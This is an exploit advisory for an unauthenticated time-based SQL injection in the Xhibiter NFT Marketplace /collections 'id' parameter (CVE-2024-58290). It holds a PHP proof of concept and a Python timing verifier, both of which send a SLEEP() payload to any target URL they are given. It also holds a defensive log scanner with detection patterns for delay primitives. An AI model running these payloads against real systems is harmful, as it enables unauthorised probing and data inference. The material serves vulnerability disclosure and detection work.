Xhibiter NFT Marketplace 1.10.2 SQL Injection

=============================================================================================================================================
| # Title : Xhibiter NFT Marketplace <= 1.10.2 Unauthenticated Time-Based SQL Injection |
| # Author : indoushka |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 147.0.1 (64-bit) |
| # Vendor : https://themeforest.net/item/xhibiter-nft-marketplace-html-template/36542347 |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/214186/ & CVE-2024-58290

[+] Summary : A time-based blind SQL injection vulnerability exists in the "id" parameter of the /collections endpoint in Xhibiter NFT Marketplace <= 1.10.2. The parameter value reaches the
database query unsanitised, so an unauthenticated attacker can inject SQL into it. The page content does not change with the injected condition, so the injection is confirmed (and data
can only be inferred) through delay-based payloads such as MySQL SLEEP(): a response that arrives the requested number of seconds late shows the database executed the injected query.
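
[+] Detection example (added here, not part of the advisory or its PoC) : the following Python scanner flags probes of the vulnerable parameter in web server access logs. It parses combined-format lines, decodes the query string twice so that both the http_build_query()-encoded payload used by the PoC and double-encoded variants are matched, and scopes the check to the "id" parameter on /collections as described above. The log lines embedded in it are constructed samples; the delay-primitive list goes beyond MySQL SLEEP() to the equivalents in other engines.

```python
"""Flag time-based SQL injection probes against /collections?id= in web server logs.

Added detection example; it is not part of the advisory and the log lines
below are constructed (combined log format) to exercise it. Values are decoded
twice so URL-encoded and double-encoded payloads are both matched, and the
check is scoped to the parameter and endpoint named in the advisory.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
# Delay primitives used by time-based blind injection across common engines.
TIME_BASED_RE = re.compile(
    r"\bsleep\s*\(|\bbenchmark\s*\(|\bpg_sleep\s*\(|\bwaitfor\s+delay\b", re.IGNORECASE
)
# Weaker signal: a quote that breaks out of the string context, followed by a boolean operator.
QUOTE_BREAK_RE = re.compile(r"'\s*(and|or)\b", re.IGNORECASE)

WATCHED_PATH = "/collections"
WATCHED_PARAM = "id"


def parse_line(line: str):
    """Split one combined-format line into fields plus decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qs decodes once; unquote_plus again catches %2527-style double encoding.
    rec["params"] = {k: [unquote_plus(v) for v in vals]
                     for k, vals in parse_qs(url.query, keep_blank_values=True).items()}
    return rec


def classify(value: str):
    """Return the indicator name for a suspicious parameter value, or None."""
    if TIME_BASED_RE.search(value):
        return "time-based"
    if QUOTE_BREAK_RE.search(value):
        return "quote-break"
    return None


def scan(lines):
    """Return one finding per suspicious id value on the watched endpoint."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].rstrip("/").endswith(WATCHED_PATH):
            continue
        for value in rec["params"].get(WATCHED_PARAM, []):
            indicator = classify(value)
            if indicator:
                findings.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                                 "id": value, "indicator": indicator})
    return findings


# Constructed sample: line 1 is the PoC payload as http_build_query() encodes it,
# line 3 the same idea double-encoded, line 4 a quote-only probe,
# line 5 a SLEEP() outside the watched endpoint, line 6 a non-log line.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2025:10:15:01 +0000] "GET /xhibiter/collections?id=1%27+AND+%28SELECT+5678+FROM+%28SELECT%28SLEEP%285%29%29%29DwVr%29+AND+%271%27%3D%271 HTTP/1.1" 200 5123',
    '198.51.100.2 - - [12/Mar/2025:10:15:03 +0000] "GET /xhibiter/collections?id=42 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [12/Mar/2025:10:15:09 +0000] "GET /xhibiter/collections?id=1%2527%2520AND%2520sleep%25285%2529 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [12/Mar/2025:10:15:12 +0000] "GET /xhibiter/collections?id=1%27+AND+%271%27%3D%271 HTTP/1.1" 200 5123',
    '198.51.100.9 - - [12/Mar/2025:10:16:00 +0000] "GET /xhibiter/search?q=SLEEP%285%29 HTTP/1.1" 200 812',
    'this line is not in combined log format',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['indicator']:<11} id={f['id']!r}")
```

Run it with a real log piped in by replacing SAMPLE_LOG with sys.stdin; the "quote-break" indicator is deliberately reported separately because a single quote followed by AND/OR is a much weaker signal than a delay primitive and will need tuning against legitimate traffic.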


[+] Usage : php poc.php --url=http://target/xhibiter

[+] POC :

<?php
// Time-based blind SQL injection check for Xhibiter NFT Marketplace <= 1.10.2
// (CVE-2024-58290). Sends the SLEEP(5) payload to /collections?id= and compares
// the response time against a baseline request made with a benign id, so a
// slow but patched target is not reported as vulnerable.

if (php_sapi_name() !== 'cli') {
    die("Run this script from CLI only.\n");
}

const SLEEP_SECONDS = 5;

function banner() {
    echo "
##########################################################
# CVE-2024-58290 - Xhibiter SQL Injection Detector       #
# PHP Poc by indoushka                                   #
##########################################################
";
}

// Issue one GET and return [elapsed seconds, curl error string].
function timedRequest($url) {
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL            => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT        => SLEEP_SECONDS * 3,
        CURLOPT_FOLLOWLOCATION => true,
        // Lab targets often run with self-signed certificates.
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
    ]);

    $start = microtime(true);
    curl_exec($ch);
    $duration = microtime(true) - $start;
    $error = curl_error($ch);
    curl_close($ch);

    return [$duration, $error];
}

function checkVulnerability($baseUrl) {
    $endpoint = rtrim($baseUrl, '/') . "/collections";

    // Time-based SQL injection payload: closes the string context of "id",
    // forces a SLEEP() subquery, then re-balances the quotes.
    $payload = "1' AND (SELECT 5678 FROM (SELECT(SLEEP(" . SLEEP_SECONDS . ")))DwVr) AND '1'='1";

    $benignUrl = $endpoint . "?" . http_build_query(['id' => '1']);
    $injectUrl = $endpoint . "?" . http_build_query(['id' => $payload]);

    echo "[*] Target URL: {$endpoint}\n";
    echo "[*] Measuring baseline response time...\n";

    list($baseline, $error) = timedRequest($benignUrl);
    if ($error) {
        echo "[!] CURL Error: {$error}\n";
        return 2;
    }
    echo "[*] Baseline: " . round($baseline, 2) . " seconds\n";

    echo "[*] Testing for SQL Injection (Time-Based)...\n";
    list($duration, $error) = timedRequest($injectUrl);
    if ($error) {
        echo "[!] CURL Error: {$error}\n";
        return 2;
    }

    // Judge the extra delay over the baseline rather than the raw response
    // time; allow half a second of jitter.
    $extra = $duration - $baseline;
    if ($extra >= SLEEP_SECONDS - 0.5) {
        echo "\n[+] SUCCESS: Target is VULNERABLE to CVE-2024-58290\n";
        echo "[+] Response delay: " . round($duration, 2) . " seconds (" . round($extra, 2) . " over baseline)\n";
        echo "[+] Database executed SLEEP(" . SLEEP_SECONDS . ")\n";
        return 0;
    }

    echo "\n[-] FAILED: Target does not appear vulnerable\n";
    echo "[-] Response time: " . round($duration, 2) . " seconds (baseline " . round($baseline, 2) . ")\n";
    return 1;
}

$options = getopt("", ["url:"]);

if (!isset($options['url'])) {
    echo "Usage: php poc.php --url=http://target/xhibiter\n";
    exit(1);
}

banner();
exit(checkVulnerability($options['url']));
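
[+] Verification example (added here, not the advisory author's PoC) : the PoC above reports a hit from a single measurement, which misfires when a target is simply slow or overloaded. The Python check below reuses the same SLEEP() payload but takes the median of several trials for a baseline and for two injected requests with different SLEEP() lengths, and only reports the target as vulnerable when the extra delay over baseline tracks both requested lengths. The transport is passed in as a callable: simulated_target() is a constructed stand-in that returns the time a request would take (no real sleeping), and http_timed_get() is the transport for a real host; the hostname, trial counts and tolerance are assumptions, not values from the advisory.

```python
"""Differential timing verdict for the /collections?id= time-based SQLi.

Added example; this is not the advisory author's PoC. It reuses the PoC's
SLEEP() payload but reaches a verdict from repeated measurements: a baseline
with a benign id, then two injected requests with different SLEEP() lengths,
each taken as the median of several trials. The target is only called
"vulnerable" when the extra delay over baseline tracks the requested sleep
length for both lengths, which a merely slow target cannot fake.
"""
import re
import statistics
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable

# Same injection string as the PoC, with the SLEEP() length parameterised.
PAYLOAD_TEMPLATE = "1' AND (SELECT 5678 FROM (SELECT(SLEEP({n})))DwVr) AND '1'='1"


def build_payload(seconds: int) -> str:
    return PAYLOAD_TEMPLATE.format(n=seconds)


def http_timed_get(base_url: str, timeout: float = 30.0) -> Callable[[str], float]:
    """Transport for a real target: GET /collections?id=<value>, return elapsed seconds."""
    endpoint = base_url.rstrip("/") + "/collections"

    def timed_get(id_value: str) -> float:
        url = endpoint + "?" + urllib.parse.urlencode({"id": id_value})
        start = time.monotonic()
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                resp.read()
        except urllib.error.HTTPError:
            pass  # a 4xx/5xx page still reflects how long the query took
        return time.monotonic() - start

    return timed_get


_SLEEP_RE = re.compile(r"SLEEP\((\d+)\)", re.IGNORECASE)


def simulated_target(vulnerable: bool, latency: float) -> Callable[[str], float]:
    """Constructed stand-in for a server: returns the seconds a request *would* take.

    A vulnerable target adds the SLEEP() argument to its base latency; a patched
    one ignores the payload. No real sleeping, so the example runs instantly.
    """
    def timed_get(id_value: str) -> float:
        m = _SLEEP_RE.search(id_value)
        return latency + (int(m.group(1)) if (vulnerable and m) else 0)

    return timed_get


def naive_poc_verdict(elapsed: float, threshold: float = 5.0) -> bool:
    """Single-request rule: vulnerable if the injected request took >= threshold."""
    return elapsed >= threshold


def check_time_based_sqli(timed_get: Callable[[str], float], short: int = 2,
                          long: int = 5, trials: int = 3, tolerance: float = 1.0) -> dict:
    """Differential check: extra delay must match two different SLEEP() lengths."""
    def median_time(id_value: str) -> float:
        return statistics.median(timed_get(id_value) for _ in range(trials))

    baseline = median_time("1")  # benign id: the target's normal response time
    extra_short = median_time(build_payload(short)) - baseline
    extra_long = median_time(build_payload(long)) - baseline
    vulnerable = (abs(extra_short - short) <= tolerance
                  and abs(extra_long - long) <= tolerance)
    return {"baseline": baseline, "extra_short": extra_short,
            "extra_long": extra_long, "vulnerable": vulnerable}


if __name__ == "__main__":
    if len(sys.argv) > 1:  # python3 timing_check.py http://target/xhibiter
        print(check_time_based_sqli(http_timed_get(sys.argv[1])))
    else:
        slow_patched = simulated_target(vulnerable=False, latency=6.0)
        print("single-request rule, slow patched target:",
              naive_poc_verdict(slow_patched(build_payload(5))))  # True: false positive
        print("differential check, slow patched target:",
              check_time_based_sqli(slow_patched)["vulnerable"])  # False
        print("differential check, vulnerable target:",
              check_time_based_sqli(simulated_target(True, 0.3))["vulnerable"])  # True
```

Against a real host each trial really waits for the requested SLEEP(), so a run with the defaults costs roughly 3 x (2 + 5) seconds plus baseline time; keep the tolerance above the target's observed jitter, or the check will reject a genuinely vulnerable but noisy host.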


Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================